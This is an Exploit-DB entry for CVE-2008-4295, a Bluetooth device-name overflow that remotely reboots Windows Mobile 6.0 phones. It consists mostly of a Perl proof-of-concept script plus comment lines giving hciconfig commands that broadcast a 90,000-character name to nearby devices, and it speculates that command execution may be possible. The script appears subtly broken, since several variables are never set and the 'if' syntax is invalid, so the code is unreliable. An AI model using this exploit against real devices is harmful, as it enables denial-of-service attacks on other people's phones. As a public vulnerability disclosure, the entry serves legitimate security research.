Windows Mobile 6.0 Device long name Remote Reboot Exploit

ID EDB-ID:6582
Type exploitdb
Reporter Julien Bedard
Modified 2008-09-26T00:00:00


Windows Mobile 6.0 Device long name Remote Reboot Exploit. CVE-2008-4295. Dos exploit for hardware platform

# ----------WM6 remote overflow reboot PoC----------
# Simple exploit for remote rebooting a windows mobile device
# Maybe we can use it for doing command execution,
# I've not test it since the device is rebooting and do not dump a core
# for further analysing.
# The bug is not realy in the long string name but when it's the first
# time the wm6 device try to get a connection with too long name. 
# There's two way to exploit this bug, this PoC show the first method 
# (direct connect to the device if we know the bdaddr) but you can
# just wait for the device to search and overflow by itself when
# seeing the hci name:
# hciconfig <hci dev> name `perl -e 'print "A"x90000'`
# hciconfig <hci dev> piscan
# You just have to wait until the wm device search for bluetooth devices
# in range and it will be overflowed
#  *Tested on WM6 fully patched  on [HTC wiza 200],[HTC Mda 8125]
# (by Julien Bedard)

use Net::Bluetooth;

$overflow="A" x 90000;

if (@ARGV < 2)
die "Usage:\n       ./ <target_mac> <hci_device>\n\n";

# change this lame cmd ???
system("hciconfig $hci_dev name $overflow");

$over_conn = Net::Bluetooth->newsocket("RFCOMM");
print "socket error $!\n" unless(defined($over_conn));
$over_conn->connect($target, $rfcomm_port);

# [2008-09-26]